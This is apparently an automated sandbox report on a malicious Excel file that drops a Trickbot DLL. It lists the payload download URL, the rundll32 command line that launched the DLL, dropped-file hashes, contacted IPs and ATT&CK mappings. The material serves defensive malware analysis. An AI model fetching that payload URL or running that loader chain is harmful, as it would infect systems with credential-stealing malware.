                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00485950 push dword ptr [edx+14h]; ret
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: hsdksksk.iem.0.drBinary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
                Source: hsdksksk.iem.0.drBinary or memory string: INTERNALNAMESNIFFER.EXE
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_002C095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_002C0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery21Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Heur.32219.xls9%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll13%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\hsdksksk.iem13%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                4.2.rundll32.exe.3e0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://koneckotechnology.com/netmons.dll0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                koneckotechnology.com
                198.54.114.131
                truefalse
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://koneckotechnology.com/netmons.dllfalse
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpfalse
                    high
                    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                      high
                      http://investor.msn.comrundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                        high
                        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                          high
                          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                            high
                            http://investor.msn.com/rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpfalse
                              high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              198.54.114.131
                              koneckotechnology.comUnited States
                              22612NAMECHEAP-NETUSfalse

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:412857
                              Start date:13.05.2021
                              Start time:01:48:22
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 15m 15s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:SecuriteInfo.com.Heur.32219.22782 (renamed file extension from 22782 to xls)
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@7/7@1/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 3.8% (good quality ratio 3.8%)
                              • Quality average: 100%
                              • Quality standard deviation: 0%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              Warnings:
                              Show All
                              • Max analysis timeout: 720s exceeded, the analysis took too long
                              • TCP Packets have been reduced to 100
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              01:48:47API Interceptor1x Sleep call for process: rundll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              198.54.114.13159c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • koneckotechnology.com/netmons.dll
                              c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • koneckotechnology.com/netmons.dll
                              Dridex.xlsGet hashmaliciousBrowse
                              • kmschoolsystems.net/lzpd0w.zip

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              koneckotechnology.com59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131
                              c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              NAMECHEAP-NETUS1cec9342_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 198.54.114.164
                              First_stely_shit_open_please.exeGet hashmaliciousBrowse
                              • 199.188.200.202
                              59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131
                              c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 198.54.114.131
                              CRPR7mRha6.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              W9YDH79i8G.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              Ko4zQgTBHv.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              Purchase Order.exeGet hashmaliciousBrowse
                              • 198.54.126.165
                              wed.docGet hashmaliciousBrowse
                              • 198.54.122.60
                              ORDER CONFIRMATION.docGet hashmaliciousBrowse
                              • 198.54.122.60
                              SecuriteInfo.com.Trojan.Packed2.43091.10004.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              6e5c05e1_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              RFQ Plasma cutting machine.docGet hashmaliciousBrowse
                              • 198.54.122.60
                              Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                              • 198.54.117.216
                              main_setup_x86x64.exeGet hashmaliciousBrowse
                              • 162.255.119.164
                              00098765123POIIU.exeGet hashmaliciousBrowse
                              • 199.192.23.253
                              e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                              • 185.61.154.27
                              2021_May_Quotation_pdf.exeGet hashmaliciousBrowse
                              • 198.54.115.133
                              337840b9_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 198.54.122.60
                              Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                              • 198.54.117.212

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                                c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                                  C:\Users\user\hsdksksk.iem59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                                    c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):643072
                                      Entropy (8bit):6.894237499747235
                                      Encrypted:false
                                      SSDEEP:12288:o2ga6aRz0uEbMN7TR7EPMx4lK6SjVWDeyt7kGXDba2k5GA:fgPaRz3CMNR/4lu8f7Pnq5GA
                                      MD5:3BB9FE6B7E6B4D9C3A3C83DE6AACD952
                                      SHA1:57C343AE5E95FE702B759737522E85FE9E97FE5E
                                      SHA-256:697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                                      SHA-512:1E98417C6C48E0BF405AE5FEDA4193C91A3B385F387F33D79FBA3DC6F7AA7571444885E6628B7CA6075887BFBEC3BD17E0782C11A1C45A7D4B1A139849CA4DF0
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Joe Sandbox View:
                                      • Filename: 59c9f346_by_Libranalysis.xls, Detection: malicious, Browse
                                      • Filename: c527325d_by_Libranalysis.xls, Detection: malicious, Browse
                                      Reputation:low
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........@.......................................................................................>..E...\!..........|....................p...4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Y...@...0...@..............@....rsrc...|............p..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\71EE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):82102
                                      Entropy (8bit):7.89057556988921
                                      Encrypted:false
                                      SSDEEP:1536:9KWFA4s1rWGH3W4nAeWRlMVGoIahaDHTU6hryF70KiZ:9KWFA4s1rW23W4ng2sTU2yF70KiZ
                                      MD5:D142FA450F0F0D3B7B50CA21E9FB3004
                                      SHA1:5E6B41E41041641F4841C4A5BC3C4EBD1050EB05
                                      SHA-256:425F91DACC94180825D3E42B226F03524A52ADC0782F3EE43DAC3AB3554837E0
                                      SHA-512:535BFF423C41BCF8B648314C4139F0B8B2F68F954ACE828FB8DEFF5AE1C4D5270B50D6837E8F2B6EB0AE054691F4C603BFD9E07E57E0E4E685CA87CE65EB124E
                                      Malicious:false
                                      Reputation:low
                                      Preview: .U.N.0....;D....&M....]2...0.Ic...1......A...H.$.......5..D...Y....J.u..^......pJ..e[@v.:.........[...s...+.....t>Z..3.y.r#......\z...:e..Z..N.T]..s..U?v.T.....'.`.I.P.iL... ...R$Z.~..A.z......^..La.Q.#Os<..q.i..VP]......|0.......8Ivi..A.i..H..2..'n.........D^^./.|...:-Ayykik....*d.49Ii..(.G#.%.b3.....eFnok.}.A..}|. .../..|..Phf6.....s...r/".?)R.{w...g|.(..>6..#.1]:.W...B.....P.3..D.1i.W....W...z......P.&.y..V........PK..........!..uq.............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 07:48:43 2021, atime=Thu May 13 07:48:43 2021, length=8192, window=hide
                                      Category:dropped
                                      Size (bytes):867
                                      Entropy (8bit):4.483620836343206
                                      Encrypted:false
                                      SSDEEP:12:85QJCiA0LgXg/XAlCPCHaXEKB8VXB/RsX+WnicvbG+bDtZ3YilMMEpxRljKbTdJU:85Bi/XT0K6VXEYevDv3qKrNru/
                                      MD5:CF89FECF15B4AFD2F6C3847707E24D8E
                                      SHA1:C640AF43927C1E78563A6E624B5C470305155186
                                      SHA-256:E9DFC2AD8DBB30BDFFD57BBE39794CFA8A32D8A31EF2F429774DC858626AE332
                                      SHA-512:F90552A5A6AA2E1A6B822776A2B64A5E35C15F19BEC0FBE509D1FB380B2C54637916F5B4D042B61D6BF9D6179A0A01311D6D991BA4432664A37E8246121B5AB1
                                      Malicious:false
                                      Reputation:low
                                      Preview: L..................F...........7G...&;..G...&;..G... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.F..Desktop.d......QK.X.R.F*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.32219.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 07:48:30 2021, mtime=Thu May 13 07:48:43 2021, atime=Thu May 13 07:48:43 2021, length=107520, window=hide
                                      Category:dropped
                                      Size (bytes):2198
                                      Entropy (8bit):4.568094777517766
                                      Encrypted:false
                                      SSDEEP:48:80/XT0ZVXpHhFyHhwKQh20/XT0ZVXpHhFyHhwKQ/:80/XuVXpbKQh20/XuVXpbKQ/
                                      MD5:1190531A9E1F2D3B7DF1EC5931401519
                                      SHA1:EE288D9AD34AE5411810D8675607C89D7E6516BC
                                      SHA-256:714B6DCA9C727F05F47995E883C12972F5F5EE35A457514245E0C2ABF524AB09
                                      SHA-512:01D12F1429DC273ACDA8ECE247B62632735F8D6620F5275E1630D4BA71FC09D99A55BDAF2695165493BDD7135AC2E6740BA5B0C5855408F9FA1256A250F5FB9D
                                      Malicious:false
                                      Reputation:low
                                      Preview: L..................F.... ...8....G...&;..G..=.D..G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.F..Desktop.d......QK.X.R.F*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..T...R.F .SECURI~1.XLS..l......R.F.R.F*....%....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.2.2.1.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\SecuriteInfo.com.Heur.32219.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.2.2.1.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):134
                                      Entropy (8bit):4.809828785316945
                                      Encrypted:false
                                      SSDEEP:3:oyBVomM0bbcd5ouscbbcd5omM0bbcd5ov:dj60i5Vi560i5y
                                      MD5:CA5CCBB60A8F1D7106F009189FDAA89A
                                      SHA1:8403283EB886BBE8CDDE5EBAE93A404E95DD60C2
                                      SHA-256:B21B9338FAFD2534E092A29CBD91C6191B752893052C91D9D8E0E39A5EF4F70A
                                      SHA-512:8F9F71C2990E49364E592B155EF260712F7B32690C57C6E0DC4F6E74275A3F69D3FCA629729A1997C845106FEEFABF6D66548604D70BEFA4ED24511722214FDD
                                      Malicious:false
                                      Reputation:low
                                      Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.32219.LNK=0..SecuriteInfo.com.Heur.32219.LNK=0..[xls]..SecuriteInfo.com.Heur.32219.LNK=0..
                                      C:\Users\user\Desktop\42EE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:Applesoft BASIC program data, first line number 16
                                      Category:dropped
                                      Size (bytes):140623
                                      Entropy (8bit):6.7953105382189065
                                      Encrypted:false
                                      SSDEEP:3072:hm8rmjAItyzElBIL6lECbgBGGP5xLmuCSS62rTUKyF70/iLW2K0P+U2K0Ps/hm8f:E8rmjAItyzElBIL6lECbgBvP5NmuCSS+
                                      MD5:4D3A0B0125D561E5232043E09932F88E
                                      SHA1:A211B5D29B2EE1E594E4084282B9522473EABE42
                                      SHA-256:20AB1224A546FF43AF9CC99BE30A8A89519679CB0709FF3674B00AA6E704DA0F
                                      SHA-512:E2305290D66D3D1E33B96E7EE449F23A2A86D94C6183F6DA06FF6182E3DFD636BD4553620A1049891FE67D1F60311E87F363865D26C2FB8AF2DD4F714070A2C6
                                      Malicious:false
                                      Reputation:low
                                      Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...........
                                      C:\Users\user\hsdksksk.iem
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):643072
                                      Entropy (8bit):6.894237499747235
                                      Encrypted:false
                                      SSDEEP:12288:o2ga6aRz0uEbMN7TR7EPMx4lK6SjVWDeyt7kGXDba2k5GA:fgPaRz3CMNR/4lu8f7Pnq5GA
